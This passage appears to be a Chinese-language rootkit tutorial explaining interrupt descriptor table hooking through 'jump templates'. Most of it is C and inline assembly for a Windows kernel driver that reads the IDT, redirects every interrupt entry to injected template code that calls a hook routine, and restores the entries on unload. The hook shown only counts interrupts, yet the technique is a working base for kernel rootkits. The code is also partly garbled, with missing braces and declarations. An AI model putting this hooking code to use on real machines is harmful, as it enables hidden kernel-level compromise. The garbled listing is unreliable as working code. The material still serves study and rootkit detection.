
下面来介绍中断表的钩子,由于每个中断服务例程都位于不同的地址,因此每项的重入地址都是唯一的,这就需要一个跳转模板来调用到rootkit代码中,这种技术就称之为跳转模板(jump template)技术。

所有模板调用相同的rootkit代码,函数总是返回到的它的调用者,因此不必担心rootkit代码中的运行时地址修正。这种技术将唯一的特定代码作用于每个ISR(Interrupt Service Rountine)钩子。在下面的示例中,这个唯一的代码保存了每个中断处理器的正确中断编号。




#ifdef _DEBUG

// debuggering version nops out our 'hook'

// this works w/ no crashes

char jump_template[] = {

0x90, //nop, debug

0x60, //pushad

0x9C, //pushfd

0xB8, 0xAA, 0x00, 0x00, 0x00, //mov eax, AAh

0x90, //push eax

0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, //call 08:44332211h

0x90, //pop eax

0x9D, //popfd

0x61, //popad

0xEA, 0x11, 0x22, 0x33, 0x44, 0x08, 0x00 //jmp 08:44332211h



char jump_template[] = {

0x90, //nop, debug

0x60, //pushad

0x9C, //pushfd

0xB8, 0xAA, 0x00, 0x00, 0x00, //mov eax, AAh

0x50, //push eax

0x9A, 0x11, 0x22, 0x33, 0x44, 0x08, 0x00, //call 08:44332211h

0x58, //pop eax

0x9D, //popfd

0x61, //popad

0xEA, 0x11, 0x22, 0x33, 0x44, 0x08, 0x00 //jmp 08:44332211h



下面代码给出了每个中断都调用的函数。该函数只是计算每个中断的调用次数,它将中断编号作为参数传递。其中使用了多处理器安全的InterlockedIncrement函数来递增中断计数器。中断计数器保存为一个unsigned long 类型的全局数组。

// using stdcall means that this function fixes the stack before returning (opposite of cdecl)

// interrupt number passed in EAX

void __stdcall count_interrupts(unsigned long inumber)


//todo, may have collisions here?

unsigned long *aCountP;

unsigned long aNumber;

// due to far call, we need to correct the base pointer

// the far call pushes a double dword as the return address

// and I don't know how to make the compiler understand this

// is a __far __stdcall (or whatever it's called)

// anyway:


// [ebp+0Ch] == arg1


__asm mov eax, [ebp+0Ch]

__asm mov aNumber, eax

//__asm int 3

aNumber = aNumber & 0x000000FF;

aCountP = &g_i_count[aNumber];



DriverEntry 例程运行该补丁,执行修正操作,并为中断服务表中的每项生成跳转模板

NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )


IDTINFO idt_info; // this structure is obtained by calling STORE IDT (sidt)

IDTENTRY* idt_entries; // and then this pointer is obtained from idt_info


unsigned long addr;

unsigned long count;

char _t[255];

theDriverObject->DriverUnload = OnUnload;

// 下面初始化全局中断计数表,它存储每个中断的调用次数。中断编号对应// 于数组中的偏移量





// load idt_info

__asm sidt idt_info

idt_entries = (IDTENTRY*) MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase);


// save old idt pointers


for(count=START_IDT_OFFSET;count < MAX_IDT_ENTRIES;count++)


i = &idt_entries[count];

addr = MAKELONG(i->LowOffset, i->HiOffset);

_snprintf(_t, 253, "Interrupt %d: ISR 0x%08X", count, addr);


old_ISR_pointers[count] = MAKELONG(idt_entries[count].LowOffset,idt_entries[count].HiOffset);


// 下面分配足够的内存来存储全部跳转模板。这块内存需要位于//NonPagedpool中


// setup the detour table


idt_detour_tablebase = ExAllocatePool(NonPagedPool, sizeof(jump_template)*256);

// 以下代码用来获得NonPagePool中每个跳转表位置的指针,将跳转模板复//制到该位置,然后将正确的重入地址和中断编号贴入跳转模板中。对每个中断//每次都执行这些操作。



int offset = sizeof(jump_template)*count;

char *entry_ptr = idt_detour_tablebase + offset;

// entry_ptr points to the start of our jump code in the detour_table

// copy the starter code into the template location

memcpy(entry_ptr, jump_template, sizeof(jump_template));

#ifndef _DEBUG

// stamp the interrupt number

entry_ptr[4] = (char)count;

// stamp the far call to the hook routine

*( (unsigned long *)(&entry_ptr[10]) ) = (unsigned long)count_interrupts;


// stamp the far jump to the original ISR

*( (unsigned long *)(&entry_ptr[20]) ) = old_ISR_pointers[count];

// 将中断表项修改为指向刚创建的新的跳转模板

// finally, make the interrupt point to our template code

__asm cli

idt_entries[count].LowOffset = (unsigned short)entry_ptr;

idt_entries[count].HiOffset = (unsigned short)((unsigned long)entry_ptr >> 16);

__asm sti


DbgPrint("Hooking Interrupt complete");




VOID OnUnload( IN PDRIVER_OBJECT DriverObject )


int i;

IDTINFO idt_info; // this structure is obtained by calling STORE IDT (sidt)

IDTENTRY* idt_entries; // and then this pointer is obtained from idt_info

char _t[255];

// load idt_info

__asm sidt idt_info

idt_entries = (IDTENTRY*) MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase);

DbgPrint("ROOTKIT: OnUnload called\n");



_snprintf(_t, 253, "interrupt %d called %d times", i, g_i_count[i]);



DbgPrint("UnHooking Interrupt...");



// restore the original interrupt handler

__asm cli

idt_entries[i].LowOffset = (unsigned short) old_ISR_pointers[i];

idt_entries[i].HiOffset = (unsigned short)((unsigned long)old_ISR_pointers[i] >> 16);

__asm sti


DbgPrint("UnHooking Interrupt complete.");

